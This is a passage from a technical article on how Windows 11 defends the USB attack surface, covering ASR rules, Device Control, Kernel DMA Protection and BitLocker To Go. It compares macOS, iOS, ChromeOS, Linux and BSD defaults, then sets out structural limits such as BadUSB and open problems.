&lt;p&gt;Section 5 was the &lt;em&gt;pipeline&lt;/em&gt;. This section is the &lt;em&gt;roster&lt;/em&gt;: every Windows-11-shipping mechanism that defends the USB attack surface, what it actually does, and -- in the table at the end of this section -- what it does not.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The inbox class-driver roster.&lt;/strong&gt; The class drivers that bind to a USB device after Stage 6 are mostly Microsoft-authored and ship in every Windows 11 SKU. They include &lt;code&gt;hidclass.sys&lt;/code&gt; and &lt;code&gt;hidusb.sys&lt;/code&gt; for keyboards, mice, joysticks, and HID-over-USB; &lt;code&gt;usbstor.sys&lt;/code&gt; for the Mass Storage Class; &lt;code&gt;usbprint.sys&lt;/code&gt; for the Printer Class; &lt;code&gt;usbaudio2.sys&lt;/code&gt; for USB Audio Class 2.0; &lt;code&gt;usbvideo.sys&lt;/code&gt; for the USB Video Class (webcams); &lt;code&gt;usbser.sys&lt;/code&gt; for the CDC Serial class; &lt;code&gt;winusb.sys&lt;/code&gt; for vendor-specific generic-access scenarios; the &lt;code&gt;UcmCx.sys&lt;/code&gt; family for Type-C connector management; &lt;code&gt;Hidi2c.sys&lt;/code&gt; for HID-over-I2C; and &lt;code&gt;wpdusb.sys&lt;/code&gt; for MTP / PTP Windows Portable Devices [@ms-usb-3-0-stack] [@ms-typec] [@ms-winusb]. Every class driver in that list is signed under the Kernel-Mode Code Signing policy [@ms-kmcs]. Every class driver in that list trusts the descriptor that selected it.&lt;code&gt;Hidi2c.sys&lt;/code&gt; is the sleeper attack surface on most laptops. Internal precision touchpads, fingerprint readers, and increasingly proximity sensors are HID-over-I2C devices wired to the chipset, not the external USB bus. They are not subject to USB-side Device Control policy because they are not USB devices; they are HID devices that happen to talk a different transport. The HID class definition is the same as it is on USB.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kernel DMA Protection policy surface.&lt;/strong&gt; KDP exposes three Group Policy values on &lt;code&gt;DMAGuard\DeviceEnumerationPolicy&lt;/code&gt;: &lt;em&gt;Block&lt;/em&gt; (the default; conservative posture), &lt;em&gt;Allow with audit&lt;/em&gt;, and &lt;em&gt;Allow all&lt;/em&gt;. The Microsoft Learn reference is verbatim about the default behavior: &lt;em&gt;&quot;By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen&quot;&lt;/em&gt; [@ms-kdp]. KDP&apos;s silicon and firmware prerequisites (IOMMU support, UEFI DMAR / IVRS publication) are non-trivial; on many post-2019 OEM platforms the toggle is shipping in BIOS but turned off until an administrator changes the firmware setting.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The ASR + Device Control + GPO triangle.&lt;/strong&gt; The three deployable layers of enterprise USB policy on Windows 11 are an Attack Surface Reduction rule, the Microsoft Defender for Endpoint Device Control framework, and the older Group Policy Device Installation Restrictions family.&lt;/p&gt;

Attack Surface Reduction is a set of policy-defined kernel-and-userland rules in Microsoft Defender for Endpoint that block specific abusable behaviors. Each rule is identified by a GUID and toggled per-rule by Group Policy, Intune, or PowerShell. ASR rules sit in front of common execution sinks (Office child processes, script-from-email runs, USB-borne executables) and refuse the operation when the rule is in Block mode. They are a policy layer on top of the Windows execution model, not a re-design of it.
&lt;p&gt;The ASR rule that targets USB-borne malware is &lt;em&gt;&quot;Block untrusted and unsigned processes that run from USB&quot;&lt;/em&gt;, GUID &lt;code&gt;b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4&lt;/code&gt; on Microsoft&apos;s ASR-rule-to-GUID matrix [@ms-asr-rules]. (Several published guides cite the unrelated GUID &lt;code&gt;d4f940ab-401b-4efc-aadc-ad5f3c50688a&lt;/code&gt; for the same rule; per the matrix that GUID is actually &lt;em&gt;&quot;Block all Office applications from creating child processes&quot;&lt;/em&gt;. The corrected USB GUID is the one to deploy.) Microsoft Defender for Endpoint Device Control is the granular layer: groups, rules, and settings let an administrator allow read-only-for-corporate-encrypted-USB, deny-write-for-personal-USB, allow corporate HID by VID/PID/serial, and a dozen other primitive combinations per-user [@ms-devcontrol]. The older Group Policy Device Installation Restrictions framework has eight policies (&lt;code&gt;AllowedDeviceClasses&lt;/code&gt;, &lt;code&gt;DenyDeviceClasses&lt;/code&gt;, &lt;code&gt;AllowedDeviceIDs&lt;/code&gt;, &lt;code&gt;DenyDeviceIDs&lt;/code&gt;, and so on) and uses Setup Class GUIDs such as &lt;code&gt;GUID_DEVCLASS_USB&lt;/code&gt; (&lt;code&gt;{36FC9E60-C465-11CF-8056-444553540000}&lt;/code&gt;) and &lt;code&gt;GUID_DEVCLASS_HIDCLASS&lt;/code&gt; (&lt;code&gt;{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}&lt;/code&gt;) for class-wide rules [@ms-gpo-devinstall] [@ms-devsetupclasses].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;BitLocker To Go.&lt;/strong&gt; The full-volume-encryption story for removable media on Windows has been BitLocker To Go since Windows 7. On Windows 11 the default cipher is XTS-AES-128 (administrators can promote to XTS-AES-256 via the Group Policy &lt;em&gt;&quot;Choose drive encryption method and cipher strength&quot;&lt;/em&gt; under Removable Data Drives), and the Group Policy &lt;em&gt;&quot;Deny write access to removable drives not protected by BitLocker&quot;&lt;/em&gt; is the enterprise opt-in to force the contract [@ms-bitlocker]. BitLocker To Go protects the &lt;em&gt;data on&lt;/em&gt; a USB stick if it is lost or stolen. It does not protect the host from a malicious peripheral, because the malicious peripheral does not present itself as a BitLocker-managed volume; it presents itself as whatever it pleases at Stage 5.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;USB-IF Authentication Specification Revision 1.0.&lt;/strong&gt; Published in the form of an ECN and errata dated January 7, 2019 [@usbif-auth-spec], this specification defines cryptographic peripheral identity using ECDSA P-256, X.509 certificate chains, and SHA-256 hashing -- the same primitives Windows already uses for KMCS and BitLocker. The standard exists. Windows ships no in-box consumer. No major host operating system in 2026 consumes it. The 2019 promise of cryptographic device identity has been seven years away for seven years.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; USB-IF Authentication 1.0 is the only mechanism in this entire roster that would architecturally close the BadUSB-class HID-injection problem. Every other defense in the table below mitigates the &lt;em&gt;symptoms&lt;/em&gt; of the descriptor-trust gap. USB-IF Authentication would close the gap itself. It was published as an ECN seven years ago [@usbif-auth-spec]. Windows does not consume it. macOS does not consume it. Linux does not consume it. The defense is not absent because it is hard; it is absent because no host operating system has committed engineering to it. That is the institutional gap.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The SOTA roster, in a comparison table:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;th&gt;What it gates&lt;/th&gt;
&lt;th&gt;Attack class addressed&lt;/th&gt;
&lt;th&gt;Does NOT address&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;KMCS [@ms-kmcs]&lt;/td&gt;
&lt;td&gt;Loading of unsigned &lt;code&gt;.sys&lt;/code&gt; files into ring zero&lt;/td&gt;
&lt;td&gt;Arbitrary kernel-mode driver loads&lt;/td&gt;
&lt;td&gt;Descriptors a signed driver consumes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kernel DMA Protection [@ms-kdp]&lt;/td&gt;
&lt;td&gt;Pre-login + post-login DMA from Thunderbolt / USB4 PCIe endpoints&lt;/td&gt;
&lt;td&gt;Thunderclap-class DMA attacks&lt;/td&gt;
&lt;td&gt;USB 2.0/3.x storage and HID; pre-DMAR firmware platforms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ASR USB rule &lt;code&gt;b2b3f03d-...&lt;/code&gt; [@ms-asr-rules]&lt;/td&gt;
&lt;td&gt;Unsigned and untrusted process launch from USB-mounted volume&lt;/td&gt;
&lt;td&gt;AutoRun-like execution; mass-storage-borne executables&lt;/td&gt;
&lt;td&gt;HID-injection (no process is launched); descriptor-parser bugs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MDE Device Control [@ms-devcontrol]&lt;/td&gt;
&lt;td&gt;Per-VID/PID/serial allow-deny on read, write, execute, file-walk&lt;/td&gt;
&lt;td&gt;Any policy-named USB device class&lt;/td&gt;
&lt;td&gt;Devices the policy explicitly allows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GPO Device Installation Restrictions [@ms-gpo-devinstall] [@ms-devsetupclasses]&lt;/td&gt;
&lt;td&gt;Setup-class-wide allow-deny by Device Setup Class GUID&lt;/td&gt;
&lt;td&gt;Whole-class blocks (e.g. all USB Storage)&lt;/td&gt;
&lt;td&gt;Devices the policy allow-lists&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BitLocker To Go [@ms-bitlocker]&lt;/td&gt;
&lt;td&gt;Encryption of data at rest on removable USB volumes&lt;/td&gt;
&lt;td&gt;Lost / stolen thumb drive&lt;/td&gt;
&lt;td&gt;Malicious peripheral; host compromise&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AutoRun-disable (KB971029 era) [@krebs-feb2011] [@wiki-autorun]&lt;/td&gt;
&lt;td&gt;&lt;code&gt;autorun.inf&lt;/code&gt;-driven AutoPlay launch on insert&lt;/td&gt;
&lt;td&gt;Conficker-class AutoRun worms&lt;/td&gt;
&lt;td&gt;HID injection; descriptor parser bugs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Driver Block List / Vulnerable Driver Block List [@ms-kmcs]&lt;/td&gt;
&lt;td&gt;Loading of named known-bad signed &lt;code&gt;.sys&lt;/code&gt; files&lt;/td&gt;
&lt;td&gt;Bring-Your-Own-Vulnerable-Driver&lt;/td&gt;
&lt;td&gt;New (unlisted) malicious-but-signed driver&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;USB-IF Authentication 1.0&lt;/strong&gt; [@usbif-auth-spec]&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Cryptographic peripheral identity at enumeration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Descriptor-trust impossibility result (BadUSB)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;(Standard exists; Windows does not consume it)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;{`
// Emulates the PowerShell check:
//   $p = Get-MpPreference
//   $p.AttackSurfaceReductionRules_Ids
//   $p.AttackSurfaceReductionRules_Actions
// In a real Windows 11 enterprise rollout, run the PowerShell as administrator.&lt;/p&gt;
&lt;p&gt;const USB_RULE_GUID = &quot;b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4&quot;; // &quot;Block untrusted and unsigned processes from USB&quot;
const ACTION = { DISABLED: 0, BLOCK: 1, AUDIT: 2, WARN: 6 };&lt;/p&gt;
&lt;p&gt;// Sample output that a healthy enterprise endpoint should produce.
const sample = {
  ids: [USB_RULE_GUID, &quot;d4f940ab-401b-4efc-aadc-ad5f3c50688a&quot;, &quot;75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84&quot;],
  actions: [ACTION.BLOCK, ACTION.BLOCK, ACTION.BLOCK],
};&lt;/p&gt;
&lt;p&gt;const i = sample.ids.indexOf(USB_RULE_GUID);
if (i &amp;lt; 0) {
  console.log(&quot;ASR USB rule not present in policy.&quot;);
} else if (sample.actions[i] === ACTION.BLOCK) {
  console.log(&quot;ASR USB rule is ENABLED in BLOCK mode.&quot;);
} else if (sample.actions[i] === ACTION.AUDIT) {
  console.log(&quot;ASR USB rule is in AUDIT mode (events logged, nothing blocked).&quot;);
} else {
  console.log(&quot;ASR USB rule is DISABLED (action=&quot; + sample.actions[i] + &quot;).&quot;);
}
`}&lt;/p&gt;
&lt;p&gt;Eight Windows-shipping mechanisms, one missing implementation. The implementation gap is structural: the only complete defense in the roster is the one Windows does not ship.&lt;/p&gt;
&lt;h2&gt;7. USB Security on Non-Windows Platforms&lt;/h2&gt;
&lt;p&gt;Windows is not the only OS that inherits USB&apos;s descriptor-trust premise. Every host operating system since 1996 has inherited the same contract; each has staked out a different position on how to live with it. The contrast clarifies what Windows chose.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;macOS on Apple Silicon (Ventura 2022, extended Sequoia 2024).&lt;/strong&gt; Apple Support is verbatim on the prompt: &lt;em&gt;&quot;When you use a new or unknown USB accessory, Thunderbolt accessory, or SD card with your Mac laptop with Apple silicon, you get an alert that asks you to allow the accessory to connect&quot;&lt;/em&gt; [@apple-mac-usb]. The same page documents the four user-selectable modes -- &lt;em&gt;Always ask&lt;/em&gt;, &lt;em&gt;Ask for new accessories&lt;/em&gt;, &lt;em&gt;Automatically allow when unlocked&lt;/em&gt;, &lt;em&gt;Always allow&lt;/em&gt; -- and the lockout window: &lt;em&gt;&quot;If your Mac has been locked for 3 or more days, you might need to unlock it to use a previously allowed accessory again&quot;&lt;/em&gt; [@apple-mac-usb]. Apple is the only major host OS that ships a user-facing prompt as the default posture.Apple Silicon Macs enforce the accessory-prompt at the hardware level through the Secure Enclave Processor, not purely in software. This is architectural inference from Apple&apos;s general SEP-policy documentation; Apple Support pages describe the user-visible behavior, not the SEP-side enforcement chain. The architectural distinction matters because the prompt is not a kernel-side policy a privileged process can bypass.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;iOS USB Restricted Mode (iOS 11.4.1, 2018; USB-C version, iOS 17+).&lt;/strong&gt; Apple Support carries the iOS variant verbatim: &lt;em&gt;&quot;By default, you need to first unlock your iPhone or iPad to connect to an accessory or computer&quot;&lt;/em&gt; [@apple-ios-usb]. Modern USB-C iPhones and iPads expose the same four-mode setting as the Mac: &lt;em&gt;Always Ask&lt;/em&gt;, &lt;em&gt;Ask for New Accessories&lt;/em&gt;, &lt;em&gt;Automatically Allow When Unlocked&lt;/em&gt;, &lt;em&gt;Always Allow&lt;/em&gt; [@apple-ios-usb]. iOS came first; macOS adopted the same UX pattern four years later.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ChromeOS.&lt;/strong&gt; USB device authorization on ChromeOS is tied to the user-signin state; HID-class injection vectors are default-deny after suspend on managed devices. ChromeOS&apos;s documentation of the exact enforcement chain is sparse, so we will only describe what is publicly observable: the policy hooks exist, the enterprise-managed posture is default-deny, the consumer posture is default-allow.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Linux &lt;code&gt;usbguard&lt;/code&gt;.&lt;/strong&gt; The open-source &lt;code&gt;usbguard&lt;/code&gt; daemon implements per-user, per-device USB authorization on top of the kernel&apos;s sysfs &lt;code&gt;authorized&lt;/code&gt; flag [@usbguard]. The architectural cousin of Windows&apos;s Defender for Endpoint Device Control, &lt;code&gt;usbguard&lt;/code&gt; ships a mature policy language (&lt;code&gt;usbguard list-devices&lt;/code&gt;, &lt;code&gt;usbguard allow-device&lt;/code&gt;, declarative &lt;code&gt;rules.conf&lt;/code&gt;) and integrates cleanly with PolicyKit. The catch is that no major Linux distribution enables &lt;code&gt;usbguard&lt;/code&gt; by default; it is opt-in software a sysadmin installs. Linux&apos;s &lt;em&gt;kernel&lt;/em&gt; has had the &lt;code&gt;authorized&lt;/code&gt; sysfs flag since 2007; what it has not had is a default-deny posture out of the box.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OpenBSD &lt;code&gt;umass(4)&lt;/code&gt; / FreeBSD opt-in USB policy.&lt;/strong&gt; The BSD family of operating systems ships conservative defaults: separated drivers per class, no &lt;code&gt;autorun.inf&lt;/code&gt;-equivalent in the file manager, and a documented user-mode authorization story. Deployment scale is small; the design is included here only to illustrate that a default-deny posture is technically possible inside an inherited USB protocol contract.&lt;/p&gt;
&lt;p&gt;The cross-platform comparison:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Default posture&lt;/th&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;Pre-login HID injection&lt;/th&gt;
&lt;th&gt;DMA isolation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows 11 25H2&lt;/td&gt;
&lt;td&gt;Allow on insert&lt;/td&gt;
&lt;td&gt;Policy frameworks layered over descriptor trust [@ms-asr-rules] [@ms-devcontrol] [@ms-gpo-devinstall]&lt;/td&gt;
&lt;td&gt;Mitigated only by ASR USB rule + Device Control allow-list (enterprise opt-in)&lt;/td&gt;
&lt;td&gt;Kernel DMA Protection on capable platforms [@ms-kdp]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS (Apple Silicon)&lt;/td&gt;
&lt;td&gt;Prompt user&lt;/td&gt;
&lt;td&gt;User-facing approval dialog, 3-day re-prompt window [@apple-mac-usb]&lt;/td&gt;
&lt;td&gt;Mitigated by default prompt (consumer + enterprise)&lt;/td&gt;
&lt;td&gt;Apple-managed IOMMU + SEP policy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;iOS (USB-C)&lt;/td&gt;
&lt;td&gt;Locked-until-unlock&lt;/td&gt;
&lt;td&gt;User-facing approval dialog [@apple-ios-usb]&lt;/td&gt;
&lt;td&gt;Mitigated by default prompt&lt;/td&gt;
&lt;td&gt;Apple-managed IOMMU + SEP policy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ChromeOS (managed)&lt;/td&gt;
&lt;td&gt;Default deny after suspend&lt;/td&gt;
&lt;td&gt;Sign-in-state-gated authorization&lt;/td&gt;
&lt;td&gt;Mitigated by default deny (managed devices)&lt;/td&gt;
&lt;td&gt;Platform-IOMMU policy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux + usbguard&lt;/td&gt;
&lt;td&gt;Default deny if installed&lt;/td&gt;
&lt;td&gt;User-space daemon over kernel &lt;code&gt;authorized&lt;/code&gt; flag [@usbguard]&lt;/td&gt;
&lt;td&gt;Mitigated &lt;em&gt;if&lt;/em&gt; &lt;code&gt;usbguard&lt;/code&gt; installed (opt-in)&lt;/td&gt;
&lt;td&gt;Distribution-dependent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stock Linux&lt;/td&gt;
&lt;td&gt;Allow on insert&lt;/td&gt;
&lt;td&gt;Kernel &lt;code&gt;authorized&lt;/code&gt; flag exists, default is allowed&lt;/td&gt;
&lt;td&gt;Not mitigated&lt;/td&gt;
&lt;td&gt;Distribution-dependent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenBSD / FreeBSD&lt;/td&gt;
&lt;td&gt;Conservative by default&lt;/td&gt;
&lt;td&gt;Per-class driver opt-in&lt;/td&gt;
&lt;td&gt;Not the default attack surface (low deployment)&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Two platforms (Apple&apos;s, both of them) prompt the user as the default posture. One (Linux) ships an opt-in user-space daemon. Windows is the only major platform that combines a kernel-mode device-control framework with cross-platform telemetry inside Microsoft Defender for Endpoint -- and the only one still relying entirely on enterprise opt-in for the HID-injection mitigation. The consumer default on Windows 11 25H2 is allow-on-insert.&lt;/p&gt;
&lt;h2&gt;8. What Windows Cannot Defend Against&lt;/h2&gt;
&lt;p&gt;We have walked the modern pipeline and seen the roster of defenses. We owe the reader a clean accounting of where the model is structural -- where no plausible Windows version closes the gap without breaking USB compatibility. There are five named limits, and none of them are bugs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 1: The descriptor-trust impossibility result.&lt;/strong&gt; USB has, by specification, no out-of-band identity. A peripheral that &lt;em&gt;declares&lt;/em&gt; itself to be a keyboard &lt;em&gt;is&lt;/em&gt; a keyboard for purposes of the bus-enumeration handshake. The Wikipedia reference is explicit about the device-class architecture in which the peripheral, not the host, owns the declaration [@wiki-usb]. Until USB-IF Authentication (cryptographic device identity) is universal at the silicon level, this gap is structural to the protocol. Closing it on the host side -- by, say, refusing to bind a class driver until the device signs a challenge -- would break every existing USB device on the market.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 2: HID-class trust is structural, not technical.&lt;/strong&gt; A USB HID keyboard issues input events to the focused window. Windows has no way to know whether the user is the source of those events or whether a reprogrammed thumb drive is. The SR Labs disclosure is verbatim about why the host cannot tell the difference: the same Phison or Cypress controller chip that ships in a thumb drive can be reprogrammed to enumerate as a HID device with a vendor-controlled report descriptor [@srlabs-badusb-pdf] [@wiki-badusb]. Microsoft Defender for Endpoint Device Control supports granular HID rules, but they are opt-in, enterprise-only, and inherently break every external keyboard the policy does not allow. The structural cost of fixing this is breaking USB.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 3: Firmware reprogrammability of commodity USB controllers.&lt;/strong&gt; Phison, Cypress, Genesys, Realtek, and the rest of the commodity USB-controller market ship field-flashable firmware. The Psychson toolchain demonstrated the Phison PS2251-03 reflash end-to-end and made it reproducible in a researcher&apos;s afternoon: &lt;em&gt;&quot;firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector&quot;&lt;/em&gt; [@psychson-repo]. The O.MG Cable productionized the technique inside a USB-A-to-Lightning cable form factor, proving the attack is now commercial-supply-chain-implantable [@omg-cable]. The host operating system has no view into the controller&apos;s firmware, no way to attest it, and no way to reject a peripheral that exposes a different identity post-flash than it did pre-flash.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 4: Kernel DMA Protection is opt-in at three layers.&lt;/strong&gt; Silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare &lt;code&gt;DmaRemappingCompatible=1&lt;/code&gt; in its INF) [@ms-kdp] [@ms-dmaremap]. Many post-2019 OEM platforms ship with the firmware toggle off in BIOS. Worse, the Thunderclap research demonstrated that even on IOMMU-enabled systems, &lt;em&gt;shared&lt;/em&gt; IOMMU contexts between a peripheral and a kernel driver are a viable attack vector [@ndss-thunderclap]. KDP also has no view at all of USB 2.0/3.x mass storage or HID, which do not perform DMA.&lt;/p&gt;

Windows only uses the IOMMU in limited cases and remains vulnerable. -- Markettos, Rothwell, Gutstein, Pearce, Neumann, Moore, and Watson, *Thunderclap*, NDSS 2019 [@ndss-thunderclap]
&lt;p&gt;&lt;strong&gt;Limit 5: The descriptor parser is C code in the kernel.&lt;/strong&gt; &lt;code&gt;usbhub3.sys&lt;/code&gt; and &lt;code&gt;usbccgp.sys&lt;/code&gt; are partially undocumented, are closed-source, and parse adversarial input in a memory-unsafe language.Microsoft has not published the source for &lt;code&gt;usbhub3.sys&lt;/code&gt; or &lt;code&gt;usbccgp.sys&lt;/code&gt;; the architectural descriptions on Microsoft Learn describe the externally visible behavior of these drivers, not their internal parsing routines or memory-safety properties. Any claim about their specific implementation must be hedged accordingly. The conclusion that they parse adversarial input in C is inferred from the Windows-kernel codebase&apos;s language conventions and from the public record of descriptor-parser CVEs over the last fifteen years. Andy Davis named the surface in 2011 [@ncc-davis-2011], and Google&apos;s syzkaller-USB program -- a public-record proxy for the wider community&apos;s descriptor-parser fuzzing effort -- has been producing kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb]. Until the parser is rewritten in a memory-safe language, this is finite-but-non-zero kernel-mode attack surface. Linux&apos;s &lt;code&gt;usbcore&lt;/code&gt; has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Windows has not publicly committed to a similar rewrite.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; None of these five limits is a Windows bug. The descriptor-trust gap is in USB. The HID-class trust gap is in the HID class definition. The firmware-reprogrammability gap is in commodity controller silicon. The KDP gap is in the layered opt-in posture of IOMMU-on-platform DMA isolation. The C-in-the-kernel gap is the price of Windows&apos;s compatibility-first kernel-driver model. Closing any one of them on the Windows side, in isolation, would either break the USB device market (limits 1-3), require commodity-silicon redesign (limit 3 again), or require a multi-year rewrite the engineering organization has not committed to (limit 5).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The USB attack surface on Windows is the price Windows pays for being USB-compatible. Five named gaps. Zero of them are bugs. Each is a structural cost of inheriting a 1996 protocol contract written when peripheral firmware was not field-flashable and the descriptor-trust assumption was at least defensible. In 2026 the assumption is indefensible and the contract is everywhere. The defense Windows ships is the best layered mitigation anyone has built around the gap; it does not close the gap.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;9. Open Problems&lt;/h2&gt;
&lt;p&gt;If the limits are structural, the open problems are sociological: who adopts the standard that already exists, who funds the rewrite that nobody has shipped, who builds the heuristic that no production OS has.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;USB-IF Authentication 2.0 / 3.0 uptake.&lt;/strong&gt; The standard exists as a January 2019 ECN [@usbif-auth-spec]. Device-vendor uptake is near zero outside specialized industries (automotive, medical). Windows has no in-box consumer. The blocker is not cryptographic feasibility -- ECDSA P-256 over SHA-256 with X.509 chains is everyday code -- it is two-sided market adoption: peripheral vendors will not ship the silicon until host operating systems consume it; host operating systems will not consume it until enough peripherals ship it. Someone in the duopoly of major host-OS shipping has to commit first. As of mid-2026 no one has. &lt;em&gt;Current best partial result:&lt;/em&gt; the same ECDSA-plus-X.509 attestation pattern has been deployed at scale in adjacent ecosystems -- Apple&apos;s Find My accessory-attestation network and the automotive / medical USB-Authentication-mandatory tiers -- demonstrating that the cryptographic primitive itself is silicon-shippable; what remains is OS-side consumption.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HID re-enumeration detection.&lt;/strong&gt; A thumb drive that mounts as Mass Storage, presents a benign-looking volume for a few seconds, and then re-enumerates as a composite device that adds a HID keyboard interface is the BadUSB signature [@srlabs-badusb-pdf]. No production host operating system detects this generically. A reasonable heuristic -- that a freshly enumerated device which changes its declared composition in the first fifteen seconds is suspicious -- is not in any Microsoft Defender for Endpoint hunting query as a shipped detection, only as a custom Defender XDR query an enterprise can compose itself. The heuristic is this article&apos;s own proposal, not a published primary source. &lt;em&gt;Current best partial result:&lt;/em&gt; mature Microsoft Defender Experts customers are already deploying custom Defender XDR hunting queries that key on the post-attach composition-change pattern (typically joined against the BadUSB 200 ms keystroke-burst signature in §10.4); the detection exists in mature managed-detection-and-response practices but has not landed as a default rule in any shipping product.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;USB-C Alternate Mode trust.&lt;/strong&gt; DisplayPort Alt Mode, Thunderbolt Alt Mode, and USB4-tunneled PCIe each cross OS / firmware / silicon boundaries inside a single physical connector. The display-side firmware attack surface, the Power Delivery contract negotiation, and the &lt;em&gt;&quot;fast charge negotiation opens a data path&quot;&lt;/em&gt; primitive that has emerged in commodity fast-charging hardware are all under-explored. Microsoft&apos;s Type-C UCM stack [@ms-typec] documents the connector-manager class extensions but does not (and cannot) verify the firmware behind the alt-mode peer. &lt;em&gt;Current best partial result:&lt;/em&gt; the UCM &lt;code&gt;UcmCx&lt;/code&gt; / &lt;code&gt;UcmUcsiCx&lt;/code&gt; / &lt;code&gt;UcmTcpciCx&lt;/code&gt; class-extension family ships in every Windows 11 SKU and gives the OS a uniform connector-state view it did not have before 2016 -- the partial mitigation is the architectural plumbing, not yet a firmware-attestation policy on top of it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Supply-chain attacks on USB controller chips.&lt;/strong&gt; The O.MG Cable shows that BadUSB is now manufacturing-implantable [@omg-cable]; the FBI&apos;s 2020 and 2022 FIN7 advisories show organized cybercriminal actors mailing the same primitive [@bleeping-fin7]. Hardware bill-of-materials attestation, Microsoft Defender for IoT inventory, and supply-chain risk-management frameworks (NIST SP 800-161 in the United States [@nist-sp-800-161]) are nascent on the consumer side and uneven on the enterprise side. Nothing on the consumer Windows endpoint defends the user from a cable that looks like a real cable. &lt;em&gt;Current best partial result:&lt;/em&gt; the deployable enterprise stack is USB-IF Authentication 1.0 in the small set of authentication-capable peripherals [@usbif-auth-spec], plus Microsoft Defender for IoT device-inventory telemetry, plus per-organisation bring-your-own-cable allow-list policy primitives in Defender for Endpoint Device Control [@ms-devcontrol] -- a layered stack rather than a single defence.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open-source memory-safe descriptor parser.&lt;/strong&gt; Linux&apos;s &lt;code&gt;usbcore&lt;/code&gt; has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Microsoft has not committed to a similar rewrite. The bug-volume reduction from rewriting &lt;code&gt;usbhub3.sys&lt;/code&gt; and &lt;code&gt;usbccgp.sys&lt;/code&gt; in a memory-safe language would, on the basis of the public CVE record, dwarf any single mitigation in the article. The blocker is engineering scope, not technical feasibility. &lt;em&gt;Current best partial result:&lt;/em&gt; the syzkaller-USB program has produced a continuously growing tally of kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb], proving the attack surface is empirically large; the upstream Rust-for-Linux USB driver experiments are the only public evidence that a memory-safe rewrite of a production USB stack is practical at scale.&lt;/p&gt;
&lt;blockquote&gt;
